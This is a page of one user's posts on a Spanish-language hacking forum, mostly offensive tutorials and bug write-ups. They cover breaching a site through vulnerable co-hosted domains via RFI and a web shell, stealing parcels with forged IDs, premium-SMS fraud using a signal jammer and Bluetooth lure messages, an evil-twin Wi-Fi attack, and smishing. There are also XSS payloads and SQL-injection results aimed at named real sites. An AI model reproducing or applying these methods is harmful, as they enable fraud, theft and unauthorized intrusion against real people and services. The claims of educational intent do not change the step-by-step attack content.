Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - MaztoR

#1
Presentaciones y cumpleaños / Re:Presentación [MaztoR]
Noviembre 12, 2014, 12:35:45 AM
Muchísimas gracias, de verdad es un placer estar nuevamente en casa.
#2
Lo diferente... la artilleria de tools creadas por ellos, aunque simplemente se pueden tomar esas tools y ponerlas en tu distro, asi que como aporte por parte de la distro solo he notado eso.
#3
Presentaciones y cumpleaños / Presentación [MaztoR]
Noviembre 10, 2014, 10:39:03 PM
Hola a todos un gusto estar en la comunidad nuevamente, en los inicios de Underc0de fui co-Admin por cuestiones personales y laborales tuve que pasar a una inactividad, espero en este nuevo comienzo pueda aprender mucho de la variedad de usuarios presentes, Underc0de ya es una gran comunidad y eso me alegra demasiado, estaré intentando compartir en mis ratos libres y bueno espero sea una grata experiencia.

#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
JAJAJA ;D

Te gusta trollear XD!, pronto me "vengare" XD

[10] Se respetuoso y educado con el resto de usuarios del foro. Pretendemos que el foro sea un punto de reunión para solicitar/prestar ayuda a todos los usuarios de la web. No permitiremos insultos ni faltas de respeto a ningún miembro de la comunidad, de lo contrario esto conllevará a una sanción al usuario agresor.


Me siento Ofendido :(
#5
[PAPER FOR NEWBIES]
Bueno Me eh dado cuenta que Hay casos en el que van a Ingresar a un servidor web o algo y se disponen a testear De manera Manual...

SQL
RFI
LFI
BYPASS
DIR
PATH
XSS


Entre otras Vulnerabilidades mas... Pff No logran nada !Es muy Segura! :/

Se van al Acunetix, SSS, w3AF, Intellitamper entre otros Scanner mas.. y se dedican a hacerle un Scan Completo haber si le sacan un Exploit.. y Runnearle algo :/ Nada Todo Es Seguro :(

Pues Bueno Ahora Pensaremos En ALTERNATIVAS
Citar
-SCAN DE PUERTOS Y SERVICIOS Q CORREN

-RV DNS y SCAN LOCAL A CADA WEB <-- Alguna Web Debe Ser Vulnerable!!

-RECONOCIMIENTO DE SERVER CORRIDO

-VULNERABILIDAD EN DEPENDENCIAS


Primero Usaremos un Scan de Puertos e Identificacion de Servicios

Nos decidimos a ir Sacarle la Direccion IP
-Puedes usar ShowIP [ADDON FIREFOX] = lo veran en tiempo real y Directo


-Puedes usar Comando PING para sacarlo mediante Consola


Una Ves Sacada la IP Nos dedicamos a Scannear puertos Con NMAP o NMAP ONLINE

NMAP LOCAL

Me baso en el Local para No extenderlo mas..

Código: php
/*nmap 216.52.186.158


Dicho Comando nos dara PORT STATE SERVICE


NMAP ONLINE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Muestra del Online



De Hay Vamos Sacando Argumentos hasta Sacar un resultado
Como Nos damos Cuenta Solo hay 1 Solo Puerto Abierto! :/
el 80 HTTP Por si Acaso Probaremos Todo.. jajaja IRONICO!

Iremos alguna Db-Exploits Y sacaremos algun EXPLOIT para dicho Puerto / Service
Citar
   
/*
www.exploit-db.com
www.1337day.com


[ESTE METODO DE EXPLOIT/PORT NOS SIRVE DE ALTERNATIVA]

Ahora A Tratar de entrar Al Server Mediante REV-DNS

Este Metodo para Mi Es uno Muy Eficaz ya q la mayoria de los servidores abarcan varias webs y varios tipos de programacion y Alguna podria ser Vulnerable!

En que Consiste¿?
Consiste en Sacar todas las webs Q estan en un mismo servidor ya sea la de PEPSI.. Quiero sacar las webs q estan Junto a ella en Modo server


Como Ponerlo a Prueba¿?
Simple usaremos un Servicio WEB o alguna tool que se programen para este objetivo!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Le Damos en ENVIAR y esperamos a Que nos Liste Las webs q Estan en el mismo servidor de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Una Ves Cargada la lista Podemos Descargarla en .TXT o verla ON


Bueno Ahora que haremos Con esas Webs ¿?

Simple Son varias web y estoy SEGUROOO!!! q alguna de ellas es Vulnerable a AlgO!!
ya sea XSS SQL etC!

Te preguntas que Hare explotando una web en su server si la q quiero es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ¿?

Muy Simple No defacearas la web q sea vulnerable Lo q Haras sera Meterle Shell y Escalar Directorios.. la Otra es Rootear El ADMIN GOD para listar todos Sus Webs Alojadas e ingresar a Nuestro Objetivo!!

No entiendes ¿?
Te doy un Ejemplo!!
Las webs q estan en el mismo server de pepsi son:

Código: php
www.pepsi.com
pepsi.com
pepsiusa.com
www.pepsiusa.com
dewgreenlabel.com
www.thereggiebushproject.com  <----VULNERABLE RFI
thereggiebushmix.com
pepsiholidaypacks.com
pepsistreetmotion.com
dietpepsiboxoffice.com
pepsicolastore.com <---------- VULNERABLE A BYPASSER
www.pepsifirsttaste.com
www.pepsibilliondollarchallenge.com
www.billiondollarchallenge.com
mountaindewstore.com
pepsidiet.com
dippedone.com
www.pepsilight.com


Una vez testeado todas las webs.. el resultado es q tengo 2 Webs vulnerables

Una a RFI

www.thereggiebushproject.com  <----VULNERABLE RFI

Otra a BYPASSER DE UPLOADERS

pepsicolastore.com ;---------- VULNERABLE A BYPASSER








Bueno lo q Hare es mediante el RFI subir mi Shell



|||||||||||||||| 90%

Cuando Mi Shell este Adentro Nos dedicamos a Escalar Directorios...Hasta llegar al principal..

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
www.blabla.com
www.afjasg.com
www.ghafjgasa.org

Si logramos llegar Al principal Q Procederemos a Hacer¿?
Ingresar a la Carpeta de Nuestro Objetivo y hacer Lo DESEADO :P


Como es lo Comun!!! Es Muy Probable q no puedas Escalar Directorios Para ello Hay q Proceder a ROOTEAR un ADMIN GOD... Eso Se Deja para el Proximo Tuto o Texto!!


Reconocimiento de ServerApp corrido
Este metodo Nos sirve para un reconocimiento de server
Lo haremos de Manera Web Sniffer No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
Status: HTTP/1.1 200 OK
Date: Sun, 14 Mar 2010 19:20:40 GMT
Server: Apache
Set-Cookie: PHPSESSID=fa1fd3d9039b908d6dd47592cee0e9b6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3541
Connection: close
Content-Type: text/html


Ahora usaremos El metodo de Addons :P
Usaremos Server SPY
Este Addon de Firefox Muestra en la Barra que server corre


Para que Nos sirve El Server¿?
Logico para testear mas a Fondo y saber Sobre exploits y vulnerabilidades q Podamos Runnearles :D


VULNERABILIDAD EN DEPENDENCIAS

Muy poco usado y poco Conocido.. pero sirve en ocasiones
consiste en ver las dependencias de cada web e investigar un poco de ellas y tratar de encontrarle Bugs..


Ejemplos:

   
Citarflash

Adobe

java

ETC!...

Como veremos las Dependencias ¿?
Simple! con el Addon VIEW DEPENDENCIES q esta en los addons destacados de Firefox

Imagen de Web Oficial


Una Ves obtenido las Dependencias Se procede a Investigar Y leer sobre ellas

#6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
En todo el mundo pasa eso, porque a las entidades esa, solo les interesa el dinero.

Lo peor de todo compañero fue.. que reporte la falla y aun sigue latente.
#7
/*********************************************************/
/    INTERCEPTACIONES DE ENTREGAS Y PAQUETERIA [MENSAJERIA]         /
/                                          Autor: MaztoR                                                 /
/                                                                                                                 /
/                         Genero: Ing Social + Info Exposed                                  /
/                                                                                                                 /
/*********************************************************



Bueno en este articulo voy a hablar de un servicio muy conocido llamado "Servientrega" muy similar al famoso "FEDEX", el cual para quien no lo sabe es un sistema de mensajeria y paqueteria USUALMENTE puerta a puerta o de recogida central.

El 27 de oct de 2011 venia de clases y decidi pasar por la central a ver si ya me habia llegado un paquete que me habia enviado 2 dias atras, entregue mi tarjeta de identificacion y me digeron que ya estaba hay y que se podia retirar, bueno analizando la situacion todo muy bien, pero note que con solo dar ciertos datos y tener una identificacion se podria retirar un paquete sin problemas, vaya!! es muy "DIFICIL" ante muchos conseguir toda la informacion de un envio:

quien envia, quien recibe, lugar, identificaciones ,etc.

Mucho mas dificil tener la identificacion del receptor!! hacerse con ella y obtener un paquete, al parecer todo esta bien por que es "DIFICIL" conseguir toda esa info sin conocer a la persona, seamos francos y vayamos a la realidad.

Al retirar mi paquete tenia que pagar un valor que se definia segun la distancia y el peso como en el momento no estaba conciente de que la persona que enviaba no iba a pagar el envio y era del metodo "AL COBRO" (el cual consiste en pagar una vez recibido el paquete) decido ir a mi casa y buscar dinero para poder hacer el retiro!, aqui es donde se enciende la luz... al ver mi NUMERO DE GUIA lo meti en el Rastreador de envios que tiene la pagina.

   
Código: php
www.servientrega.com/wps/portal/inicio



Me imprimio los datos completos de mi envio... asi que decido crear un numero secuencial para ver si habia otro numero de guia y correspondia a otro paquete.

Código: php
Mi numero de Guia= 7171257XXX
Numero Aleatorio= 7171257298


Efctivamente el numero secuencial con las ultimas tres cifras aleatorias me dio la informacion completa de un envio que claramente no era el mio.

IMAGENES OMITIDAS DEBIDO A LA CAIDA DEL HOSTING

vaya es info linda y valiosa...logramos ver:

REMITENTE
DESTINATARIA
DIRECCIONES
FECHAS PIEZAS
DESTINOS
y Lugar donde se encuentra el paquete :D


Ahora como muchos saben el photoshop hace maravillas!! y con un facil manejo de nivel basico-medio se puede hacer un Identificacion falsa.

Te preguntaras "ESTO NO FUNCIONARA" esa gente sabe como detectar eso y lo otro y bla bla bla... MENTIRA!! en el tiempo que llevo recibiendo paquetes y mi analisis segun su comportamiento NUNCA se han fijado en datos distintos a los ESENCIAL [NOMBRE Y NUMERO DE ID] asi que en pocas palabras la seguridad de informacion que fluyetanto entrante como saliente es INSEGURA!!

Planteemos el Escenario

1-Tenemos la ID falsa lista
2-Hacemos una llamada a la central para saber si el articulo aun esta en bodega
3-se repasa un poco la info de memoria, no se quiere fallar al momento de las preguntas superficiales.
4- se recibe el articulo y te vas.

QUE INSEGURO NO???

Seamos francos, lo peor de todo es que los numeros de GUIAS se pueden explorar en rangos y nos da distintos DESTINOS y LUGARES DE ENVIOS, es dificil para un particular estar viajando y cazando los envios de otros, pero pensemos.. que tal si una organizacion de varias personas en todo el pais, [ESTO SE PUEDE GRACIAS A INTERNET] se dedica a esto? creanme que muchos envian cosas de valor y podrian haber perdidas millonarias.

Nota:no en todas se fuga la ID del cliente, dependiendo del tipo de documento esta sera impresa.

Fugas: CC No se Imprime , TI si se imprime, DT si se imprime, otro Tipo de Documento si se imprime.

CONCLUSION

No esta demas aclarar que mis articulos no son probados CON TERCEROS REALES debido a que si algo falla no quiero terminar en la carcel jajaja y la idea no es ROBAR es analizar la seguridad para reforzarla y que errores asi no lo sepan personas con fines perversos.

Pero tambien aclaro que esto fue probado 100% en el cual un amigo se hace pasar por mi para retirar mi paquete ;) y todo salio bien, que inseguridad por dios jajaja PWNED!!!

Saludos y greetz: DRAGONJAR - DDLR - [LOWNOISE COLOMBIA]
#8
Como era de esperarse... aqui les tengo la segunda parte de "inhibidores de Señal" que les habia prometido en el articulo anterior.

Este segundo solo tratara de señales GSM y Bluetooth, las cuales mostraré como hacer un ataque dirigido, el cual se realizará con informacion que tengamos a la mano.



Primero que nada un poco de terminologias...
-----------------------------------------------------------------------------------
GSM
Segun wikipedia..


El sistema global para las comunicaciones móviles (GSM, proviene del francés groupe spécial mobile) es un sistema estándar, libre de regalías, de telefonía móvil digital.

Un cliente GSM puede conectarse a través de su teléfono con su computador y enviar y recibir mensajes por correo electrónico, faxes, navegar por Internet, acceder con seguridad a la red informática de una compañía (red local/Intranet), así como utilizar otras funciones digitales de transmisión de datos, incluyendo el servicio de mensajes cortos (SMS) o mensajes de texto.

GSM se considera, por su velocidad de transmisión y otras características, un estándar de segunda generación (2G). Su extensión a 3G se denomina UMTS y difiere en su mayor velocidad de transmisión, el uso de una arquitectura de red ligeramente distinta y sobre todo en el empleo de diferentes protocolos de radio (W-CDMA).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-----------------------------------------------------------------------------------

Bueno iniciemos la objetividad de este articulo...

Ya hemos leido anteriormente sobre 1-Inhibidores 2-señales 3-GSM; con estos terminos bien claros supongo que podras tomarte mas idea... de lo que realmente hablo y planteo en esta serie de articulos.

Ahora debemos plantear un NUEVO! "ESCENARIO PERFECTO" desde la perspectiva de un "Atacante Malicioso", Este nuevo Escenario será.. "EL PUESTO DE LLAMADAS" del cual nos aprovecharemos de su multitud de gente alterada y con poco tiempo disponible.

Nuestro Escenario:


Puesto de llamada de nivel: Intermedio
Encargados del puesto de llamadas: 1
Cantidad de personas hablando por cel: 12
Cantidad de personas en espera: 6

----------------------------------------------------------------------------------

Ahora procedamos a realizar nuestro ataque, que en este caso el beneficio sera...?
DINERO $$$, la idea de esto es lograr que el encargado o uno de sus clientes nos transfiera una suma grande de dinero mediante un simple SMS, el cual estara todo "PLANEADO" por asi decir..

Nota clave: de logica sabemos que los puntos de llamada "LA MAYORIA" son de planes "POSTPAGO", es importante saberlo porque te permite dar nocion a cual gran suma poner en tu servicio de cobro.


Primero que nada deberiamos tener un haz bajo la manga y este seria un Servicio SMS que configurariamos para que sea de cobro, eso si un cobro de gran SUMA! el cual si un telefono postpago envia un SMS al numero de nuestro servicio le cobraria la alta suma que habiamos puesto antes... que lindo no?



Iniciemos...

Con nuestro servicio SMS pedido y configurado solo procedemos a usarlo? pero de una forma arbirtraria y sin aviso alguno...

Vamos a montar nuestro INHIBIDOR de SEÑAL GSM :) cerca del puesto de llamadas objetivo, el cual la comunicacion se cortara en esa zona...


Ahora con un sistema de administracion Bluetooth, ya sea un Smartphone con una APP especifica o lo mas recomendable una PC CON BLUETOOTH vamos a analizar todos los dispositivos activos en ese sector para proceder a enviar nuestro "SMS Señuelo".

La pregunta sera..como enviare el SMS si el GSM esta inactivo en esa zona, y peor aun no se los numeros!!??

Primero que nada el GSM esta inactivo, bien dicho!... pero la señal bluetooth no :)
segundo, realmente no enviaremos un SMS asi que no necesitaremos numero telefonico, haremos uso de la tecnica Bluejacking!


Termino Bluejacking:
En seguridad informática, el término bluejacking se refiere a una técnica consistente en enviar mensajes no solicitados entre dispositivos Bluetooth, como por ejemplo teléfonos móviles, PDAs o portátiles. La tecnología Bluetooth tiene un alcance limitado de unos 10 metros normalmente en dispositivos pequeños (como teléfonos móviles) aunque otros aparatos más grandes (como portátiles) con transmisores más potentes pueden alcanzar los 100 metros. (Segun wikipedia)
---------------------------------------------------------------------------------

Mientras analizamos los dispositivos activos bluetooth debemos ver y coordinar los MTS a la redonda ademas de ver que dispositivos son los que podrian recibir los "SMS Arbirtrarios".

Una vez obtenido nuestra lista de objetivos y puntos clave para que reciban nuestro señuelo, debemo armar nuestra LETTER Corporativa la cual contendra el Numero de nuestro servicio.

Letter corporativa de Ejemplo:

Sr usuario la señal de su dispositivo movil se ha desactivado por inconvenientes, esta sera habilitada dentro de las proximas 72 hrs, si su linea es de vital importancia debido a su ocupacion, puede restaurarla enviando un SMS con la palabra RESTAURAR al 6666

------------------------------------------------------------------------------

Nota: donde 6666 es nuestro numero de servicio SMS el cual es de un costo altisimo...
-------------------------------------------------------------------------------


Una vez enviado los SMS SEÑUELO a todos los de nuestra lista de objetivos a la redonda, estos o algunos.. intentaran la restauracion de su servicio.

La pregunta ahora es... serà que van a caer?

Primero que todo pensemos... El escenario del Puesto de llamadas fue planteado por las siguientes razones...

1- Si el encargado tiene su bluetooth activado y recibe esto que pasa?

a-casi un 90 % seguro que lo hace, por que su ocupacion esta siendo suspendida la cual le generaria perdidas...

b- la multitud de gente en espera lo pone en un momento de poco pensar y de mucho hacer, asi que la solucion esta en el sms que se le envio y asi podra seguir y dejar a sus clientes satisfechos


2- Que pasa si el encargado no esta con bluetooth activo?
a- para eso dige que hay que sacar la lista de objetivos...por que de seguro muchos tienen llamadas importantes que hacer y no dudaran ni un min para hacer un pronto reestablecimiento de su servicio.

-------------------------------------------------------------------------------

Una vez que estos reciban los SMS señuelos debemos apagar nuestro inhibidor por unos segundos, muy recomendable unos 30 Seg... y enviar un nuevo SMS que diga..

Letter Ejemplo 2:
----------------------------------------------------------------------------------
Su servicio esta en mantenimiento y se generara una intermitencia en su señal, si desea restaurar su servicio lo mas pronto posible, favor enviar un SMS con la palabra RESTAURAR al numero 6666.

----------------------------------------------------------------------------------
Se desactiva el inhibidor....

Rectificando mucho el atacante en su Servicio de SMS podria notar si aun los dispositvos objetivos no han dado respuesta...cuando este note si se ha logrado captar una gran suma.. ya deberia dejar de activar su inhibidor y dejar todo estable.

Nota: El estado de intermitencia de un inhibidor se hace con el objetivo de persistir y que se haga mas tedioso para los usuarios.. con el fin de que su desespero los haga tratar de restablecer su servicio lo mas pronto posible mediante las instrucciones que se le dieron en el sms.


Conclusion: Este articulo fue creado desde la perspectiva de un atacante malicioso, sin ningun motivo de orientar al robo y con la simple gracia de enseñar y notificar las infinidades de tecnicas que se pueden usar en este "Escenario" tan inseguro!
#9
[Bueno debido a mi ausencia durante unas semanas, surge este articulo que lo dividire en 2, segun los tipos de señales que explicaré (WIFI, GSM).]


Este articulo se me ocurrio hacerlo por un "Recuerdo de viejos tiempos"; la ausencia que tuve estos dias fue debido a mi traslado de apartamento, viendo en el trasteo las cosas viejas que tenia... logre notar una pequeña caja negra pegada con cinta y hecha con un esquema demasiado rustico!!

Pero que era exactamente esa pequeña caja negra?

Esta pequeña caja era un INHIBIDOR DE SEÑAL que fue el resultado de unas pocas clases de electronica que habia tomado un compañero. Era demasiado rustico y no carecia de una funcionalidad excelente debido a que era casera y no se tenian unos masteriales de alta calidad, pero te preguntaras...

Que es un inhibidor o perturbador de señal?

Segun wikipedia

En Telecomunicación, un perturbador, también denominado inhibidor es un Dispositivo electrónico que impide o dificulta las transmisiones radioeléctricas en un determinado rango de frecuencias mediante la emisión de una señal de mayor potencia que la del emisor que quiere transmitir.

Se compone básicamente de un generador de señal y un transmisor. El primero genera una señal que es enviada a través del segundo con una potencia determinada según la necesidad. Esta señal carece de información útil, únicamente es una señal generada por un oscilador o generador de onda. Ésta, al emitirse con mayor potencia que los sistemas de transmisión a interferir, las suprime, evitando que emisor y receptor establezcan la comunicación.

Se utiliza principalmente por motivos de seguridad o con intenciones de sabotaje.


--------------------------------------------------------------------------

Segun MaztoR

Dispositivo que no permite un transcurso de señal, impidiendo, dificultando y/o creando difusion en el receptor por que esta ocupa esa frecuencia con otra señal mucho mas potente. :P (corregirme si estoy mal)


--------------------------------------------------------------------------


Bueno iniciemos la objetividad de este articulo...

ya sabemos perfectamente que es un Inhibidor de señal (si no te quedo claro para eso esta google XD) pero ahora debemos plantear un "ESCENARIO PERFECTO" desde la perspectiva de un "Atacante Malicioso" la cual consta de reemplazos o sustituciones de puntos de acceso para asi el atacante obtener un "beneficio" y una administracion de conexiones o host vibrantes en el punto "CLON" que logicamente sera el que nosotros pondremos de señuelo.

primero que nada cabe hay que aclarar ciertos puntos:

1- Un inhibidor tiene un rango de X MTS/KMTS definidos a la redonda (todo depende del tipo de inhibidor)

2- Aqui se planteara un escenario usando inhibidores portables y de poco alcance (ya sabran el porque)



Primer Escenario... [El Centro Comercial]
----------------------------------------------------------


Bueno viendo bien el grafico se puede notar que lo que hacemos es dejar a un cierto grupo de personas sin recepcion de señal y creando un nuevo punto de acceso con un nombre COPIA para hacer confusion en los usuario, copn el objetivo de que intente un reconexion buscando en su lista de detectados (logico no saldra nada por que la zona esta inhibida) pero dejamos el inhibidor unos 10 min para que los usuarios pierdan la total conexion WIFI por que si lo hacemos en fraccion de segundos no habria desconexion debido a que hace reconexion simultanea, al estar seguros de una desconexion total desactivamos el inhibidor y hacemos que nuestro punto de acceso este lo mas cerca posible con el objetivo de que elijan el punto "CLON" con mas señal, osea el de nosotros por la cercania no les parece?....

Nota: hay muchas formas de hacer puntos de acceso, te doy algunas ideas... usando tus Dispositivos Iphone, ipad por la portabilidad, con portatiles + modems etc.


Bueno ya teniendo un punto de acceso propio podemos hacer una administracion de nuestros host activos, pudiendo interceptar su trafico, sniffearlos o como le quieras hacer :)


Ahora te preguntaras.. no es mas facil conectarse al punto principal (original) y evitar todo este proceso?


Veamos no escribo cosas por nada jajaja, que tal si la clave no la sabemos?

Repuesta
creamos el punto de acceso sin clave y que sea CLON, para una conexion mas directa para los usuarios.. por que si le ponemos clave... ellos no la sabria debido a que pondrian la clave que ellos saben, pero como no la sabemos hay perdida...


De que sirve si las pcs pueden tener palomeada la opcion de "Conectarse automaticamente"

Respuesta

Simple con ingenio se logra que conecten al punto "CLON".. haber te doy una idea..

PUNTO ORIGINAL LLAMADO= CENTROCOMERCIAL
PUNTO CLON LLAMADO= CENTROCOMERCIAL ESTABLE

ponemos el inhibidor en intermitencia para que haga una especie de prendido/apagado y los usuarios tengan una pesima señal... asi que veran el punto de wifi "ESTABLE"
y decidiran usarlo :) (Este se prueba en intervalos para no perjudicar las conexiones a nuestro punto de acceso)


Este es realmente un Escenario perfecto?
#10
# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Twitter: @Mazt0r
----------------------------------
#11
Bugs y Exploits / XSS PHP_SELF [P0C DDLR]
Julio 07, 2012, 03:38:59 AM
Bueno mi compañero "DEDALO" "SEGURIDADBLANCA" me comento al DM de TT sobre unos XSS en DDLR, al ver estos noté que eran los mismos que yo habia encontrado en otras rutas, analizando muy bien su estructura se pudo decir.. es XSS en PHP_SELF.

Hablemos un poco de PHP_SELF.
Es una de las variables predefinidas de PHP ya OBSOLETA

El nombre de archivo del script ejecutándose actualmente, relativo a la raíz de documentos. Por ejemplo, $_SERVER['PHP_SELF'] en un script en la dirección No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sería /test.php/foo.bar. La constante __FILE__ contiene la ruta completa y nombre del archivo actual (es decir, incluido).

Si PHP está siendo ejecutado como un procesador de línea de comandos, esta variable contiene el nombre del script a partir de PHP 4.3.0.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esta variable es muy usada.. y muy insegura, comunmente utilizada para apuntar los formularios hacia la misma página.

=====================
Ejemplo:
=====================
Código: php


       <form action="<?=$PHP_SELF?>">
       <input type="hidden" name="submitted" value="1" />
       <input type="submit" value="Submit!" />
      </form>
     </body>
    </html>



===================
Explotacion
===================


Código: php
    /usandophpself.php/">[JS MALICIOUS CODE]



=================
Resultado
=================

Código: php
    <form action="/raiz/usandophpself.php/"><script>alert('XSS PHP_SELF')</script><foo">
       <input type="hidden" name="submitted" value="1" />
       <input type="submit" value="Submit!" />
      </form>
     </body>
    </html>


========================
Posible Fix
========================

Código: php
    $_SERVER['SCRIPT_NAME']



    Hace Referencia tambien a: $_SERVER['PHP_SELF']


========================================

Archivos [RUTAS] Vulnerables P0C
========================================
Código: php

        www.diosdelared.com/home/register.php/"><script>alert('XSS');</script>
        www.diosdelared.com/home/login.php/"><script>alert('XSS');</script>
        www.diosdelared.com/foro/index.php/"><script>alert('XSS');</script>
        www.diosdelared.com/home/index.php/"><script>alert('XSS');</script>
        www.diosdelared.com/blogs/admin.php/"><script>alert('XSS');</script>
        www.diosdelared.com/torneos.php/"><script>alert('XSS');</script>
        www.diosdelared.com/ayuda.php/"><script>alert('XSS');</script>


================================================
Creditos 3 Dedalo - 4 MaztoR
================================================

#12
Primero que nada...

Que es SMISHING??

El SMiShing es un término informático para denominar un nuevo tipo de delito o actividad criminal usando técnicas de ingeniería social empleado mensajes de texto dirigidos a los usuarios de Telefonía móvil. El SMiShing es una variante del phishing.

Segun la wikipedia.

-----------------------------------------------------------------------------------------------

La objetividad del articulo...

Sin nada que hacer me puse a analizar un poco el sistema de SMS via web del proveedor de telefonia movil "TIGO" la cual analice un rato, hasta llegar con una variable muy llamativa.

Código: php
    ?orden=1 <--Dirigida por client.php





Que me imprimio el siguiente texto: session=8923



Al ver una variable de ese tipo, lo primero que se viene a la mente es buscar BUGS, SQLI por cierto.. pero encontre algo muy curioso al cambiar el valor a 2.


Al final.. es un total de 10724, interesante ya podemos deducir que tenemos DATA FRESH! para iniciar una secuencia de SPAM.


Ahora solo nos falta programarnos un Script que nos ayude a lanzar un SMS a toda la data, preferiblemente algo de pHP por cuRL hacia un servidor usado para estos fines o un script en perl mediante uso de credenciales POST hacia algun servicio dedicado para los SMS ejemplo: PINGER.

El problema es que Pinger solo acepta 1 Numero para enviar SMS y no se puede adherir un listado de 10 K como el anterior. pero.. por script se podria...!


SMISHING directo..

Bueno el SMISHING directo consiste en coger numeros al azar ya sea 3 o 4 y realizar un tipo de ing social para obtener un beneficio final, este es mas complicado por que al ser de pocas cantidades se requiere de paciencia, creatividad y buena ing social.

Escenario SMISHING DIRECTO:

Como muchos sabran los servicios Online que ofrecen SMS gratuitos o pagos a nivel mundial te generan un numero de respuesta (NO TODOS) el cual puede ser confuso para el receptor.

De que sirve que sea confuso??

Un usuario receptor no le parecera real un supuesto premio que viene de un numero similar al de el.. en pocas palabras otro NUM de CEL de el usuario comun.

En cambio si le envias un SMS con un numero muy poco usual este creera que es de la empresa proveedora de telefonia o un target especifico para realizar el SMISHING.

EJEMPLO
: BANCO, CANALES, RADIO etc


Pruebas...
Los numeros en colombia son del tipo: 300-xxx-xxxx
En la imagen podemos notar un numero poco comun entre los receptores de SMS y al notar este creera que es proveniente de una fuente benigna.


Se puede notar que al recibir este, se le pide al usuario que conteste mediante un SMS al 6667 el cual es un sistema de SMS de cobro que se ha configurado previamente para cobrar grandisimas sumas.


Entonces podemos deducir que.. las empresas de telefonia no toman las medidas necesarias para que nuestros numeros de cel se mantengan privados a terceros en la red, El caso anterior en el cual se muestra como TIGO imprime una gran cantidad de numeros 100% REALES y servibles para los que se dedican al SMISHING, que trae como consecuencia usuarios con perdida de dinero incluso otra clase de problemas aislados a lo economico.



VULNERABLE TARGET: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
TYPE: Information Disclosure

PWNED TIGO!


Talvez te interese un articulo referente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13
Bugs y Exploits / MSN Taiwan [SQLI , BYPASS y XSS]
Julio 07, 2012, 03:23:28 AM
Bueno, por hay con un bro de ddlr nos pusimos a intentar el ingreso a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de la cual es ironico que tenga un directorio tan mugre y a la vez usando PHP y MYSQL , sin embargo decidimos explorar mas debido a que es muy llamativo todo este escenario.
Msn.tw



Iniciamos asi:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


De hay comenzamos a sacar la data...
Info basica

Apache
PHP/5.2.13
PleskLin
MySQL >=5
5.0.90

Dbs's:

information_schema
msn
test

Db Principal:

accesslog
album
board
forum
game
lotto_539
mem
open_account
open_article
open_article_content
open_article_content_d
open_board
open_collect
open_keyword
open_tracking
open_violate
photo
record
record_2005
record_2006
record_2007
record_2009
record_2010
record_2011
record_2012
redir_conf
reserve
static
static_2005
static_2006
static_2007
static_2009
static_2010
static_2011
static_2012
team
user
webcont
-----------------------------------------------------------------------------------
Despues de realizar todo esto dieron ganas de subir shell, pero no logre el objetivo, intente en paneles loguearme y logre pero nada interesante aunqu cabe aclarar que no era necesario sacar user debido a que el panel tenia bypasse.. el Uploader no servia de mucho que digamos.

PANEL CON BYPASSE


Aburrido solo me puse a explotar XSS en el foro...
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Apoyo
---------------------------------
Black-Mantic Blaron , 5TU4RT
#14
Iniciando esta pequeña entrada, disculpen mi tiempo de inactividad; les voy a explicar por que se hacen tan necesarios e importantes los errores informativos, dependiendo del tipo de escenario.


De mi parte soy de los que les gusta la auditoria manual; y siempre busco enfocarme en identificar de critico-a-leve, con eso quiero decir que me gusta primero localizar las fallas mas graves del sistema y luego ir plasmando las leves... si, es algo ironico y muy estupido (NO USO UN ESTANDAR DE ANALISIS) pero como siempre digo.. lo improvisado es aun mas interesante y por el momento solo juego a crear mi estandar aleatorio; Cabe decir que no tengo quien me diga lo que tengo o no que hacer? (JEFE)   ;)

Bueno al realizar un reporte rapido (FLASH) de las fallas criticas, nos damos cuenta que a veces es muy necesario el trabajo en equipo, aunque la falla sea tan grave y de acceso brusco, puede apoyarse de un pilar para ser explotada. Con trabajo en equipo no me refiero a buscar a un bro que nos ayude... me refiero a usar varias fallas en conjunto para que una se apoye de la otra.

En que tecnicas o vulnerabilidades usamos fallas en conjunto?

En infinidad de escenarios, todo depende del tipo de acceso que se le quiera dar a la maquina, sin embargo; yo me enfocare en las mas usadas para que sea mejor interpretado el paper.


Upload Mysql

Esta tecnica se basa  en un comando de MYSQL el cual se apoya del permiso FILE asignado en los diversos usuarios [root] para que puedan ejecutar los comandos [Into outfile/*/ Load_file()], los cuales se ejecutaran por consultas arbirtrarias con la muy conocidad vuln [SQLI].


-----------------------------------------------------------------------------------------------------------------------------------




Para llevar a cabo el anterior metodo, es necesario el apoyo de informacion adicional, aqui es donde se afirma lo escrito anteriormente, en el cual necesitaremos el trabajo en conjuunto de fallas, que ayudaran a que se logre su objetivo final.

